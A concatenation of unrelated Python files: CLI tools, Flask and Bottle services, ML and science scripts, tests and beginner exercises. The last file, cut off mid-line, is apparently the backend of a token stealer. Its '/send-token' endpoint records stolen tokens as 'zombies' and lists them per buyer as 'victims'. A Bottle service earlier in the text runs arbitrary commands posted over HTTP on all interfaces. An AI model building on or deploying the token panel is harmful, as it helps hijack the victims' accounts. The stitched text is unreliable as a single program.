@click.version_option("0.1.0") def cli(): pass @cli.command('public',) @click.argument('port') @click.argument('token', required=False) def public(port, token=""): """ public url <port>(required) <token> (telegram bot - file/text) """ if port: tun = ngrok.connect(port, bind_tls=True) url = tun.public_url if token: if os.path.isfile(token): bot = token_read(token) else: bot = token send = "https://api.telegram.org/bot"+bot+"/setWebhook?url="+url api = requests.get(send) text = api.text result = json.loads(text) if result['ok'] == True: echo(style("\nWebhook is set", bold=True, fg='green')) else: echo(style("\nWebhook isn't set", bold=True, fg='red')) echo( style("\nERROR : "+result['description'], bold=True, fg='red')) exit() echo( style(f"\nLocal Server Listen http://localhost:{port}", bold=True, fg='green')) echo(style('\nPublic Server listen : '+url, bold=True, fg='green')) ngrok_process = ngrok.get_ngrok_process() try: ngrok_process.proc.wait() except KeyboardInterrupt: echo(style("\n\nServer is off", bold=True, fg='red'),) ngrok.kill() @cli.command('php') @click.argument('port') @click.argument('path', required=False) def php(port, path): """ start php <port>(required) <path> """ if path: subprocess.call(f"php -S localhost:{port} -t {path}") else: subprocess.call(f"php -S localhost:{port}") @cli.command('create') @click.argument('name') def create(name): """ Create New Telegram bot project php <name>(required) """ port = int(click.prompt(style('Project Port ', fg='green'))) token = click.prompt(style('\nTelegram Bot Token ', fg='green')) vscode = str(click.prompt(style('\nOpen in vscode ?[y/n]', fg='green'))) creatproject(name, port, token) project = os.getcwd()+"/"+name if vscode.lower() == 'y': os.system("code "+project) def main(): cli() # run if __name__ == "__main__": main()
from flask import Flask, request, jsonify from flask_sqlalchemy import SQLAlchemy import redis from flask_cors import * import time import json from pyecharts import options as opts from pyecharts.charts import Graph # /*----------------Flask and DB----------------*/ app = Flask(__name__) app.config['SQLALCHEMY_DATABASE_URI'] = "mysql+mysqldb://root:password@localhost:3306/package" db = SQLAlchemy(app) r = redis.Redis(host="127.0.0.1", port=6379) CORS(app, supports_credentials=True) # /*----------------DB Model----------------*/ # collected package class Pkg(db.Model): __tablename__ = 'pkg' id = db.Column(db.Integer, primary_key=True) Ty = db.Column(db.String(8)) # type protocol = db.Column(db.String(10)) daddr = db.Column(db.String(40)) dport = db.Column(db.Integer) saddr = db.Column(db.String(40)) sport = db.Column(db.Integer) send_byte = db.Column(db.Integer) recv_byte = db.Column(db.Integer) time = db.Column(db.Integer) pid = db.Column(db.Integer) com = db.Column(db.String(20)) host = db.Column(db.String(40)) # doubt IP and danger IP class BanIP(db.Model): __tablename__ = "banIP" id = db.Column(db.Integer, primary_key=True) ban_ip = db.Column(db.String(40)) banned = db.Column(db.Boolean) def __init__(self, ban_ip, banned): self.ban_ip = ban_ip self.banned = banned # /*----------------Helper Function----------------*/ def ban(saddr, banned=True): # True => banned, False => warning item = BanIP.query.filter(BanIP.ban_ip == saddr).first() print(item) if item is None: new_ban_ip = BanIP(ban_ip=saddr, banned=banned) db.session.add(new_ban_ip) if banned: r["update_time"] = int(time.time()) db.session.commit() elif item.banned != banned: item.banned = banned r["update_time"] = int(time.time()) db.session.commit() else: print("Banned ip add failed. " + str(saddr) + " exists.") def broadcast_to_clients(): import json banned_IPs = [] IPs = BanIP.query.filter(BanIP.banned == True).all() for ip in IPs: banned_IPs.append(ip.ban_ip) r.publish("Banned IPs", json.dumps(banned_IPs)) def add_danger_ip(saddr): ban(saddr, banned=True) def add_doubt_ip(saddr): ban(saddr, banned=False) # /*----------------IP Control Interface----------------*/ # 前一秒的流量信息,时间戳和流量大小 @app.route("/getnetdata", methods=["GET"]) def getNetData(): hostIP = request.args.get("hostip") dockerIP = request.args.get("dockerip") protocol = request.args.get("protocol") now = time.time() print(Pkg.query.all()[-1].time) print(now) print(hostIP) print(dockerIP) print(protocol) pkgs = Pkg.query.filter(Pkg.daddr == dockerIP, Pkg.protocol == protocol, Pkg.host == hostIP, Pkg.time >= now - 2).all() print(pkgs) ret = 0 last_time = int(time.time()) try: last_time = pkgs[-1].time except: pass for pkg in pkgs: ret += pkg.send_byte + pkg.recv_byte data = { "byte": ret, "time": last_time } return jsonify(data) # 设置IP规则 @app.route("/setbanip", methods=["POST"]) def setBanIP(): data = request.json.get("data") value = request.json.get("value") global dangerip global doubtip dangerips = [] doubtips = [] # get the rules for i in data: if i["key"] in value: # print(doubtips) dangerips.append(i) else: doubtips.append(i) # update the database for i in dangerips: add_danger_ip(i["label"]) for i in doubtips: add_doubt_ip(i["label"]) # use redis to seng msg to hosts broadcast_to_clients() return "OK" # 获取所有的可疑IP和危险IP @app.route("/getbanip", methods=["GET"]) def getBanIP(): ret = { "danger": [], "doubt": [] } IPs = BanIP.query.filter().all() for ip in IPs: if ip.banned: ret["danger"].append(ip.ban_ip) else: ret["doubt"].append(ip.ban_ip) return jsonify(ret) # /*----------------Typology Show Interface----------------*/ # Receive Msg From Hosts @app.route("/refreshdockermsg", methods=["POST"]) def dockerMsg(): data = request.json host = data["host"] datalist = data["data"] r.hset("topology", host, datalist) return "ok" @app.route("/getdockermsg", methods=["GET"]) def getDockerMsg(): host = request.args.get("host") docker = request.args.get("docker") dockers = json.loads(r.hget("typology", host)) tar = None for doc in dockers: print(doc["NetworkSettings"]["Networks"]["bridge"]["IPAddress"], docker) if docker == doc["NetworkSettings"]["Networks"]["bridge"]["IPAddress"]: tar = doc break return jsonify(tar) @app.route("/getdockerstats", methods=["GET"]) def getDockerStats(): dockerID = request.args.get("dockerid") r.publish("Container Msg", dockerID) start = int(time.time()) while True: stats = r.get("containermsg") if stats is not None: break elif int(time.time())-start > 2: break ret = json.loads(stats) return jsonify(ret) @app.route("/getipsortlist") def getIPSortList(): ipdata = Pkg.query.all() ipdict = {} for i in ipdata: ipdict[i.saddr] = 0 for i in ipdata: ipdict[i.saddr] += 1 sortlist = sorted(ipdict.items(), key=lambda kv:(kv[1], kv[0]), reverse=True) return jsonify(sortlist) @app.route("/getradarmsg") def getRadarMsg(): danger = [] doubt = [] IPs = BanIP.query.all() for ip in IPs: if ip.banned: danger.append(ip.ban_ip) else: doubt.append(ip.ban_ip) ipdata = Pkg.query.all() ipdict = {} averpkg = 0 maxpkg = 0 pkgcnt = 0 for i in ipdata: pkgcnt += 1 averpkg += i.send_byte + i.recv_byte if i.send_byte + i.recv_byte > maxpkg: maxpkg = i.send_byte + i.recv_byte ipdict[i.saddr] = 0 if averpkg != 0: averpkg /= pkgcnt totalipnum = len(ipdict) hostips = r.hkeys("typology") # print(hostips) hosts = [json.loads(r.hget("typology", hostip)) for hostip in hostips] # print(hosts) maxmemuse = 0 avermemuse = 0 cnt = 0 for host in hosts: for i in host: cnt += 1 avermemuse += i["stats"]["memory_stats"]["usage"] if i["stats"]["memory_stats"]["max_usage"] > maxmemuse: maxmemuse = i["stats"]["memory_stats"]["max_usage"] if cnt != 0: avermemuse /= cnt print("cnt=", cnt) return jsonify({ "dangerrate": len(danger)/totalipnum, "doubtrate": len(doubt)/totalipnum, "maxmemuse": maxmemuse, "avermemuse":avermemuse, "averpkg": averpkg, "maxpkg": maxpkg }) def graph_base() -> Graph: nodes = [] links = [] categories = [ {"symbol": "circle", 'name': 'ryu'}, {"symbol": "diamond", 'name': 'host'}, {"symbol": "roundRect", 'name': 'dockerdata'}, ] ryu = opts.GraphNode(name="RYU", symbol_size=40, category=0) # symbol='roundRect' nodes.append(ryu) doc_id = 1 for key in r.hkeys("typology"): host = opts.GraphNode(name=key, symbol_size=30, category=1) # symbol='diamond' nodes.append(host) ryuHostLink = opts.GraphLink(source="RYU", target=key) links.append(ryuHostLink) dockerlist = json.loads(r.hget("typology", key)) print(dockerlist) for doc in dockerlist: docName = doc["Names"][0] docInfo = str(key, encoding='utf-8') + '/' + doc["NetworkSettings"]["Networks"]["bridge"]["IPAddress"] new_node = opts.GraphNode(name=str(doc_id) + docName, symbol_size=20, category=2, value=docInfo) nodes.append(new_node) hostDocLink = opts.GraphLink(source=key, target=str(doc_id) + docName) links.append(hostDocLink) doc_id += 1 linestyle_opts = opts.LineStyleOpts( is_show=True, width=2, curve=0.1, type_="solid", color="orange", ) g = ( Graph() .add("", nodes, links, repulsion=1000, categories=categories, label_opts=opts.LabelOpts(is_show=True, position="left", color='white'), linestyle_opts=linestyle_opts) .set_global_opts(title_opts=opts.TitleOpts(title="")) ) return g @app.route("/graphchart", methods=["GET"]) def get_bar_chart(): c = graph_base() return c.dump_options_with_quotes() if __name__ == '__main__': app.run(host="127.0.0.1", port=5000, debug=True)
import sys, os sys.path.append(os.pardir) # 親ディレクトリのファイルをインポートするための設定 import numpy as np from dataset.mnist import load_mnist from controllers.controller import Controller from modules.pklController import PKL # データの読み込み (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True) # 設定 # ハイパーパラメータ #iters_num = 10000 # 繰り返しの回数を適宜設定する iters_num = 100000 # 繰り返しの回数を適宜設定する train_size = x_train.shape[0] batch_size = 100 learning_rate = 0.1 filename = "mymnist_01.pkl" # instance controller = Controller() pkl = PKL() # exec params = pkl.getRandomPKL(iters_num, train_size, batch_size, learning_rate) controller.setParams(params) # savePKL pkl.savePKL(filename, params); # accuracy trycount = 1000 accuracy_cnt = 0 result = np.zeros((10, 10)) for i in range(len(x_test)): p = controller.accuracy(x_test[i]) a = np.argmax(t_test[i]) #print("p = " + str(p)) #print("a = " + str(a)) result[p][a] += 1 #print(t_test[i]) if p == a: accuracy_cnt += 1 if (i == trycount): break print("Accuracy:" + str(float(accuracy_cnt) / trycount)) print(result)
from django.db import models from improved_user.model_mixins import AbstractUser # Create your models here. class User(AbstractUser): """A User model that extends the Improved User""" is_rowo = models.BooleanField( default=False, help_text="Is the User a Robin Wood member?" )
import pandas as pd import numpy as np import pvlib import logging log = logging.getLogger(__name__) class IrradianceDataset(pd.DataFrame): """pandas.DataFrame extension class for location-aware irradiance data This class is intended to make life a bit easier when working with irradiance datasets. It extends pandas.DataFrame by adding a `location` attribute, which gives access to a pvlib.location.Location object, allowing for generation of solar position and clear sky data. In addition, several helper attributes are provided to automate certain operations: Parameters ---------- data : a pandas.Datafame, OR any argument that can be passed to a DataFrame constructor, such as a list of dicts. location : a pvlib.location.Location instance Attributes ---------- g : irradiance components clear : clear-sky irradiance components sp : solar position data k : clearness index coponents k_star : filtered clearness index components k_star_angle : solar elevation threshold for the filtered clearness index set to 8.0 be default k_star_sensitivity : sensitivity parameter for the filtered clearness index set to 50 by default Example ------- ``` data = IrradianceDataset(df, location) data.k_star.plot() ``` """ _metadata = ['location', 'k_star_sensitivity', 'k_star_angle'] @classmethod def _internal_ctor(cls, *args, **kwargs): kwargs['location'] = None return cls(*args, **kwargs) def __init__(self, data, location=None, index=None, columns=None, dtype=None, copy=True): super(IrradianceDataset, self).__init__(data=data, index=index, columns=columns, dtype=dtype, copy=copy) self.location = location self.k_star_sensitivity = 50 self.k_star_angle = 7 @property def _constructor(self): return IrradianceDataset @property def _constructor_sliced(self): return IrradianceDatasetSeries @property def is_complete(self): """Returns true if this dataset has all three of ghi, dni, and dhi""" return {'ghi', 'dhi', 'dni'} <= set(self.columns) @property def is_ghi_only(self): """Returns true if this dataset has only ghi""" c = self.columns return 'ghi' in c and 'dhi' not in c and 'dni' not in c def complete_irradiance(self): """This code adapted from pvlib.""" cols = set(self.columns) if {'ghi', 'dhi'} <= cols and 'dni' not in cols: log.info("Completing DNI irradiance") self.loc[:, 'dni'] = pvlib.irradiance.dni( self['ghi'], self['dhi'], self.sp.zenith, clearsky_dni=self.clear.dni, clearsky_tolerance=1.1) elif {'dni', 'dhi'} <= cols and 'ghi' not in cols: log.info("Completing GHI irradiance") self.loc[:, 'ghi'] = ( self['dni'] * np.cos(np.radians(self.sp.zenith) + self['dhi'])) elif {'dni', 'ghi'} <= cols and 'dhi' not in cols: log.info("Completing DHI irradiance") self.loc[:, 'dhi'] = ( self['ghi'] - self['dni'] * np.cos(np.radians(self.sp.zenith)) ) return self @property def g(self): if len({'ghi', 'dni', 'dhi'} & set(self.columns)) == 0: log.info("No irradiance data. Trying to build from clearness index.") g = self.clear * self.k_star for col in g: self.loc[:, col] = g[col] if not (self.is_complete or self.is_ghi_only): self.complete_irradiance() return pd.DataFrame( self[[col for col in self.columns if col in ('ghi', 'dni', 'dhi')]] ) @property def sp(self): sp_cols = list(filter(lambda c: c[:3] == 'sp_', self.columns)) if len(sp_cols) == 0: log.info("Calculating solar position") sp = self.location.get_solarposition(self.index) sp_cols = [f'sp_{col}' for col in sp.columns] for old, new in zip(sp.columns, sp_cols): self.loc[:, new] = sp[old] return pd.DataFrame( self[sp_cols] ).rename(columns={col:col[3:] for col in sp_cols}) @property def clear(self): clear_cols = list(filter(lambda c: c[:6] == 'clear_', self.columns)) if len(clear_cols) == 0: # TODO add a check that the clear cols correspond to the g cols log.info("Calculating clear sky irradiance") clear = self.location.get_clearsky(self.index, solar_position=self.sp) clear_cols = [f'clear_{col}' for col in clear.columns if col in self.columns or f'k_{col}' in self.columns] for old, new in zip(clear.columns, clear_cols): self.loc[:, new] = clear[old] return pd.DataFrame( self[clear_cols] ).rename(columns={col:col[6:] for col in clear_cols}) @property def k(self): k_cols = list(filter(lambda c: c[:2] == 'k_', self.columns)) if len(k_cols) == 0: log.info("Calculating clearness index") k = self.g / self.clear k_cols = [f'k_{col}' for col in k.columns] for old, new in zip(k.columns, k_cols): self.loc[:, new] = k[old] return pd.DataFrame( self[k_cols] ).rename(columns={col:col[2:] for col in k_cols}) return self @property def k_star(self): z = self.sp.zenith * np.pi / 180 angle_above_cutoff = z - np.pi / 2 + np.pi * self.k_star_angle / 180 is_above = 1/(1 + np.exp(self.k_star_sensitivity*angle_above_cutoff)) return (self.k.mul(is_above, axis=0) .replace(-np.inf, 0) .replace(np.inf, 0) .fillna(0) .add(1 - is_above, axis=0)) class IrradianceDatasetSeries(pd.Series): _metadata = ['location', 'k_star_sensitivity', 'k_star_angle'] @property def _constructor(self): return IrradianceDatasetSeries @property def _constructor_expanddim(self): return IrradianceDataset
# Exercício Python 65: Crie um programa que leia vários números inteiros pelo teclado. # No final da execução, mostre a média entre todos os valores e qual foi o maior e o menor valores lidos. # O programa deve perguntar ao usuário se ele quer ou não continuar a digitar valores. print('\033[1;33m====== EX 065 ======\033[m') op = 'Ss' cont = soma = media = maior = menor = 0 while op in 'Ss': n = int(input('Digite um número: ')) soma += n cont += 1 if cont == 1: maior = menor = n else: if n > maior: maior = n elif n < menor: menor = n op = str(input('Quer continuar? [S/N]')).strip().upper() media = soma / cont print('Você digitou {} números e a média foi de {}'.format(cont, media)) print('O maior númeoro foi {} e o menor {}'.format(maior, menor))
"""Ensure extra credentials can be supplied for inclusion in tokens. """ from __future__ import absolute_import, unicode_literals import mock from ....unittest import TestCase from oauthlib.oauth2 import RequestValidator from oauthlib.oauth2 import WebApplicationServer, MobileApplicationServer from oauthlib.oauth2 import LegacyApplicationServer, BackendApplicationServer class ExtraCredentialsTest(TestCase): def set_client(self, request): request.client = mock.MagicMock() request.client.client_id = 'mocked' return True def setUp(self): self.validator = mock.MagicMock(spec=RequestValidator) self.validator.get_default_redirect_uri.return_value = 'https://i.b/cb' self.web = WebApplicationServer(self.validator) self.mobile = MobileApplicationServer(self.validator) self.legacy = LegacyApplicationServer(self.validator) self.backend = BackendApplicationServer(self.validator) def test_post_authorization_request(self): def save_code(client_id, token, request): self.assertEqual('creds', request.extra) def save_token(token, request): self.assertEqual('creds', request.extra) # Authorization code grant self.validator.save_authorization_code.side_effect = save_code self.web.create_authorization_response( 'https://i.b/auth?client_id=foo&response_type=code', scopes=['foo'], credentials={'extra': 'creds'}) # Implicit grant self.validator.save_bearer_token.side_effect = save_token self.mobile.create_authorization_response( 'https://i.b/auth?client_id=foo&response_type=token', scopes=['foo'], credentials={'extra': 'creds'}) def test_token_request(self): def save_token(token, request): self.assertIn('extra', token) self.validator.save_bearer_token.side_effect = save_token self.validator.authenticate_client.side_effect = self.set_client # Authorization code grant self.web.create_token_response('https://i.b/token', body='grant_type=authorization_code&code=foo', credentials={'extra': 'creds'}) # Password credentials grant self.legacy.create_token_response('https://i.b/token', body='grant_type=password&username=foo&password=bar', credentials={'extra': 'creds'}) # Client credentials grant self.backend.create_token_response('https://i.b/token', body='grant_type=client_credentials', credentials={'extra': 'creds'})
#!/usr/bin/env python from nipype.interfaces.utility import Split from nipype.interfaces.base import Bunch from nipype.algorithms.modelgen import SpecifyModel import nipype.interfaces.fsl as fsl import nipype.pipeline.engine as pe import nipype.interfaces.io as nio import nipype.interfaces.utility as util from nipype.interfaces.utility import Function from nipype.interfaces.fsl import Merge from counter import Counter import copy import os def get_dm(designs,index): from nipype.interfaces.base import Bunch subject_info = Bunch(conditions = designs.single_events[index][0], onsets = designs.single_events[index][1], durations = designs.single_events[index][2]) return subject_info def make_designs(log): from stdec import stdec # Generate session_infos for all single trials nick = "tempsub" conditions = ["PT","WT","PL","WL","AT","PTerr","WTerr","PLerr","WLerr","ATerr","miss"] cond_cols = ["Code","Type"] cond_pattern = [ [['zucz*'],['hit']],[['zsw*'],['hit']], [['nucz*'],['incorrect']],[['nsw*'],['incorrect']], [['zaut*'],['hit']], [['zucz*'],['incorrect']], [['zsw*'],['incorrect']],[['nucz*'],['hit']], [['nsw*'],['hit']],[['zaut*'],['incorrect']], [['.*'],['miss']]] designs = stdec(nick,log,cond_cols,conditions,cond_pattern) designs.read_logfile() designs.getconds() designs.collapse_dm() designs.extract_events() return designs def write_conditions(designs): import numpy as np import os np.savetxt("conditions.txt",designs.all_labels,fmt="%s") return os.path.abspath("conditions.txt") def run_workflow(args): eb = pe.Workflow(name='eb') work_dir = '/home/data/scratch/UP_ST/' + args.subject eb.base_dir = work_dir get_designs = pe.Node(Function(input_names = ['log'], output_names = ['designs'], function=make_designs), name="get_designs") get_designs.inputs.log = args.log #ntrials = len(designs.all_labels) indxs = range(120) # Iterate over the list of timings get_info = pe.Node(Function(input_names = ['designs','index'], output_names = ['info'], function=get_dm), name="get_info") get_info.iterables = ('index', [1]) #get_info.iterables = ('idx', indxs) eb.connect(get_designs,'designs',get_info,'designs') # Save text file with trial list write_cond = pe.Node(Function(input_names = ['designs'], output_names = ['condfile'], function=write_conditions), name="write_conditions") eb.connect(get_designs,'designs',write_cond,'designs') # Specify model s = pe.Node(SpecifyModel(),name='sm') s.inputs.input_units = 'secs' s.inputs.time_repetition = 2.5 s.inputs.high_pass_filter_cutoff = 100. s.inputs.functional_runs = args.file eb.connect(get_info,'info',s,'subject_info') # Create FSL Level 1 Design l1d = pe.Node(fsl.Level1Design(),name='l1d') l1d.inputs.interscan_interval = 2.5 l1d.inputs.bases = {'dgamma': {'derivs' : False}} l1d.inputs.model_serial_correlations = False l1d.inputs.contrasts = [('st','T',['all','st'],[0, 1])] eb.connect(s,'session_info',l1d,'session_info') # Get it into FEAT-compatible format fm = pe.Node(fsl.FEATModel(),name='feet') eb.connect(l1d,'ev_files',fm,'ev_files') eb.connect(l1d,'fsf_files',fm,'fsf_file') # Estimate the GLM glm = pe.Node(fsl.GLM(),name='glm') glm.inputs.out_cope = 'beta.nii.gz' glm.inputs.in_file = args.file eb.connect(fm,'design_file',glm,'design') eb.connect(fm,'con_file',glm,'contrasts') # Merge estimated betas into a single volume merger = pe.JoinNode(fsl.Merge(), joinsource = 'get_info', joinfield = 'in_files', name = 'merger') merger.inputs.dimension = 't' merger.inputs.output_type = 'NIFTI_GZ' eb.connect(glm,'out_cope',merger,'in_files') # Write outputs datasink = pe.Node(nio.DataSink(), name='sinker') datasink.inputs.base_directory = '/home/mfalkiewicz/expriments/UP/preprocessed/deconvolution' datasink.inputs.container = args.subject eb.connect(infosource,'subject_id',datasink,'containter') eb.connect(merger,'merged_file',datasink,'single_trials') eb.connect(write_cond,'condfile',datasink,'conditions') # Run the whole thing #eb.run(plugin='CondorDAGMan') #eb.run(plugin='MultiProc') eb.run() if __name__ == "__main__": from argparse import ArgumentParser parser = ArgumentParser(description=__doc__) parser.add_argument("-s", "--subject", dest="subject", help="Subject name", required=True) parser.add_argument("-f", "--infile", dest="file", help="Input filename", required=True) parser.add_argument("-d", "--logfile", dest="log", help="Logfile", required=True) args = parser.parse_args() run_workflow(args)
from django.core.management.base import BaseCommand, CommandError from static_models.view_generator import ViewStaticManager from static_models.settings import settings class Command(BaseCommand): help = 'Create/update static files' def add_arguments(self, parser): parser.add_argument( '--sync', action='store_true', help="Before generation, delete existing files.", ) parser.add_argument( '-o', '--overwrite', action='store_true', help="Replace currently existing files (default is to ignore)", ) parser.add_argument( '-e', '--html_extension', action='store_true', help="Add '.html' extension to generated files.", ) def normalize_viewsetting(self, vs): if (not('query' in vs)): vs['query'] = None if (not('urls' in vs)): vs['urls'] = [] if (not('filename' in vs)): vs['filename'] = None if (not('filename_from_field' in vs)): vs['filename_from_field'] = 'pk' if (not('filepath' in vs)): vs['filepath'] = None def handle(self, *args, **options): extension = '' if (options['html_extension']): extension = 'html' normalised_viewsettings = [self.normalize_viewsetting(vs) for vs in settings.modelviews] # ok, generate count = 0 if (options['sync'] and (options['verbosity'] > 0)): print("Directories will be cleared before generation") for vs in settings.modelviews: g = ViewStaticManager( vs['view'], vs['query'], vs['urls'], vs['filename'], vs['filename_from_field'], vs['filepath'], overwrite=options['overwrite'], extension=extension, ) delete_count = 0 if (options['sync']): delete_count = g.delete() count = g.create() if (options['verbosity'] > 0): print("{} static file(s) created at '{}'".format(count, g.location))
z = int(input()) vetor = list(map(int, input().split())) m2 = m3 = m4 = m5 = 0 for y in range(0, z): if vetor[y] % 2 == 0: m2 +=1 if vetor[y] % 3 == 0: m3 += 1 if vetor[y] % 4 == 0: m4 += 1 if vetor[y] % 5 == 0: m5 += 1 print('{} Multiplo(s) de 2'.format(m2)) print('{} Multiplo(s) de 3'.format(m3)) print('{} Multiplo(s) de 4'.format(m4)) print('{} Multiplo(s) de 5'.format(m5))
""" Generic utilities used by the metacells code. Arguably all(most) of these belong in more general package(s). All the functions included here are exported under ``metacells.ut``. """ from .annotation import * # pylint: disable=redefined-builtin from .computation import * from .documentation import * from .logging import * from .parallel import * from .progress import * from .timing import * from .typing import *
import numpy as np from translate import Translator from sklearn.feature_extraction.text import TfidfVectorizer translator = Translator(from_lang="Catalan", to_lang="English") def getStops(): with open("stopwords.txt") as f: words = [x.replace("\n", "") for x in f.readlines()] return words def remove_topos(text, stops=["mataró", "mataro", "maresme", "catalunya"]): """ Delete toponyms. """ text = text.lower().split(" ") for i, word in enumerate(text): if word in stops: del text[i] return " ".join(text) def remove_words(text, stops=getStops(), hard_stops=",.-_!?¡''*+^/|"): """ Delete stopwords. """ for char in hard_stops: text = text.replace(char, "") text = text.lower().split(" ") for i, word in enumerate(text): if word in stops: del text[i] return " ".join(text) def analyze(text, corpus, max_k=3): if corpus is None: #return corpus.split(" ") return "" vectorizer = TfidfVectorizer() total_data = corpus + [text] rankings = vectorizer.fit_transform(total_data) i2word = vectorizer.get_feature_names() keys = np.argsort(np.array(rankings.todense())[-1])[::-1] keywords = [i2word[x] for x in keys[:min(max_k, len(text.split(" ")))]] return keywords def getKeywords(title, corpus_keys=None): # remove toponyms - bad translated doc_ = remove_topos(title) # translate doc_t = translator.translate(doc_) # remove stopwords doc_1 = remove_words(doc_t) # get TfIdf keywords = analyze(doc_1, corpus_keys, max_k=100) return remove_words(" ".join(keywords)) def getImageURL(title, corpus_keys=None, location="mataró", max_k=3): """ Get the url for an image based on the experience title. """ # remove toponyms - bad translated doc_ = remove_topos(title) # translate doc_t = translator.translate(doc_) # remove stopwords doc_1 = remove_words(doc_t) # get TfIdf keywords = analyze(doc_1, corpus_keys, max_k=max_k) # generate img url print("HERE") print(keywords) img_url = "https://source.unsplash.com/1600x900/?" + location + "," + ",".join(keywords) return img_url
__author__ = 'Meng'
import os import sys import time import argparse import signal from typing import List, Optional from enum import Enum import subprocess from multiprocessing import Queue, Process from bottle import request, response, post, run, get, delete class Status(Enum): PENDING = 'PENDING' RUNNING = 'RUNNING' FAILED = 'FAILED' SUCCEEDED = 'SUCCEEDED' CANCELLED = 'CANCELLED' def __str__(self): return str(self.value) class Batch: def __init__(self, batch_id: str, status: Status, cli_args: List[str], pid: Optional[int] = None, log: Optional[str] = None): self.id = batch_id self.cli_args = cli_args self.status = status self.log = log self.pid = pid def to_dict(self): return { 'id': self.id, 'status': str(self.status), 'log': self.log, } FOUR_HUNDRED_ERROR = { 'error': 'ValidationError', 'error_message': 'Must post request body of form {"args":[...]}', } @post('/batch/<batch_id:path>') def post_batch(batch_id): global batch_dict if not request.json: response.status = 400 return FOUR_HUNDRED_ERROR cli_args = request.json.get('args') if not cli_args or not isinstance(cli_args, list): response.status = 400 return FOUR_HUNDRED_ERROR if batch_id in batch_dict: response.status = 400 return { 'error': 'ValidationError', 'error_message': f"Batch `{batch_id}` already exists." } batch = Batch(batch_id, Status.PENDING, cli_args) batch_dict[batch_id] = batch process_queue.put(batch) return batch.to_dict() def update_batch_dict(): global batch_dict while not status_queue.empty(): status: Batch = status_queue.get() batch_dict[status.id] = status @get('/batch/<batch_id:path>') def get_batch(batch_id): update_batch_dict() maybe_batch = batch_dict.get(batch_id) if maybe_batch: return maybe_batch.to_dict() response.status = 404 return { 'error': 'NotFound', 'error_message': f"Batch `{batch_id}` not found." } @delete('/batch/<batch_id:path>') def delete_batch(batch_id): global batch_dict update_batch_dict() maybe_batch: Batch = batch_dict.get(batch_id) if not maybe_batch: response.status = 404 return { 'error': 'NotFound', 'error_message': f"Batch `{batch_id}` not found." } if maybe_batch.status == Status.PENDING: response.status = 400 return { 'error': 'ValueError', 'error_message': f"Batch `{batch_id}` still pending, unable to delete." } os.kill(maybe_batch.pid, signal.SIGKILL) maybe_batch.status = Status.CANCELLED batch_dict[batch_id] = maybe_batch return maybe_batch.to_dict() @get('/health') def get_health(): return {"status": "OK"} def poll_batch(process_q: Queue, status_q: Queue): while True: if process_q.empty(): time.sleep(5) else: batch: Batch = process_q.get() result = run_batch(status_queue, batch) status_q.put(result) def run_batch(status_q: Queue, batch: Batch): base_log_dir = f'/var/log/steps/{batch.id}' os.makedirs(base_log_dir, exist_ok=True) stderr_path = f'{base_log_dir}/stderr.log' stdout_path = f'{base_log_dir}/stdout.log' with open(stderr_path, 'w') as stderr, open(stdout_path, 'w') as stdout, \ subprocess.Popen(batch.cli_args, stdout=stdout, stderr=stderr, env=os.environ, bufsize=8192) as proc: batch.status = Status.RUNNING batch.pid = proc.pid status_q.put(batch) return_code = proc.wait() with open(stderr_path) as f: batch.status = Status.SUCCEEDED if return_code == 0 else Status.FAILED batch.log = f.read() or None return batch if __name__ == '__main__': parser = argparse.ArgumentParser(description="A container that dangerously batches arbitrary commands") parser.add_argument('-p', '--port', help='Port to run the service on', type=int, default=8998) parser.add_argument("-H", "--host", type=str, help="Which host to bind", default="0.0.0.0") args = parser.parse_args() batch_dict = {} process_queue = Queue() status_queue = Queue() batch_runner_process = Process(target=poll_batch, args=(process_queue, status_queue)) batch_runner_process.daemon = True batch_runner_process.start() run(host=args.host, port=args.port)
from backend.common_tile import CommonTile class Plains(CommonTile): def __init__(self): super().__init__() self.food = self.food + 1 self.production = self.production + 1
__all__ = [ 'FourState'] from direct.directnotify import DirectNotifyGlobal from direct.fsm import ClassicFSM from direct.fsm import State class FourState: notify = DirectNotifyGlobal.directNotify.newCategory('FourState') def __init__(self, names, durations=[ 0, 1, None, 1, 1]): self.stateIndex = 0 self.track = None self.stateTime = 0.0 self.names = names self.durations = durations self.states = {0: State.State(names[0], self.enterState0, self.exitState0, [ names[1], names[2], names[3], names[4]]), 1: State.State(names[1], self.enterState1, self.exitState1, [ names[2], names[3]]), 2: State.State(names[2], self.enterState2, self.exitState2, [ names[3]]), 3: State.State(names[3], self.enterState3, self.exitState3, [ names[4], names[1]]), 4: State.State(names[4], self.enterState4, self.exitState4, [ names[1]])} self.fsm = ClassicFSM.ClassicFSM('FourState', list(self.states.values()), names[0], names[0]) self.fsm.enterInitialState() return def setTrack(self, track): if self.track is not None: self.track.pause() self.track = None if track is not None: track.start(self.stateTime) self.track = track return def enterStateN(self, stateIndex): self.stateIndex = stateIndex self.duration = self.durations[stateIndex] or 0.0 def isOn(self): return self.stateIndex == 4 def changedOnState(self, isOn): pass def enterState0(self): self.enterStateN(0) def exitState0(self): self.changedOnState(0) def enterState1(self): self.enterStateN(1) def exitState1(self): pass def enterState2(self): self.enterStateN(2) def exitState2(self): pass def enterState3(self): self.enterStateN(3) def exitState3(self): pass def enterState4(self): self.enterStateN(4) self.changedOnState(1) def exitState4(self): self.changedOnState(0)
import sys sys.path.insert(0,'./class') from flask import render_template, request, render_template_string, send_file from Cache import Cache from Utils import Utils import flask, json class Api(): def __init__(self, port, config): self.Cache = Cache('./Data/Account.json', './Data/Zombies.json', config['HOOK']) self.base_api = config['API']['BASE'] self.app = flask.Flask(__name__) self.Utils = Utils(config['API']['OWNER_TOKEN']) app = self.app self.prt = port @app.route('/', methods= ['GET']) def send_index(): return render_template('index.html'), 201 @app.errorhandler(404) def not_found(error): return render_template('404.html'), 404 @app.errorhandler(500) def internal_error(error): return render_template('404.html'), 500 @app.route(f'{self.base_api}/send-token') def send_token(): self.Cache.add_zombie(request.args.get('token')) return 'ok' # Peux êre opti pour la recherche | where? @app.route('/token', methods= ['GET']) def token(): key = request.args.get('key') with open('./Data/Account.json', 'r') as database: db = json.load(database) victim_to_send = [] victims = [] for acc in db['ACCOUNTS']: if key in config['API']['ADMIN_KEYS']: break elif db['ACCOUNTS'][acc]['KEY'] == key: victims = db['ACCOUNTS'][acc]['VICTIMS'] break else: return render_template('error.html') with open('./Data/Zombies.json') as zombies_database: zb_db = json.load(zombies_database) for zombie in zb_db['Zombies']: if (zb_db['Zombies'][zombie]['Token'])[:24] in victims or key in config['API']['ADMIN_KEYS']: victim_to_send.append(zb_db['Zombies'][zombie]) return render_template('token.html', database= 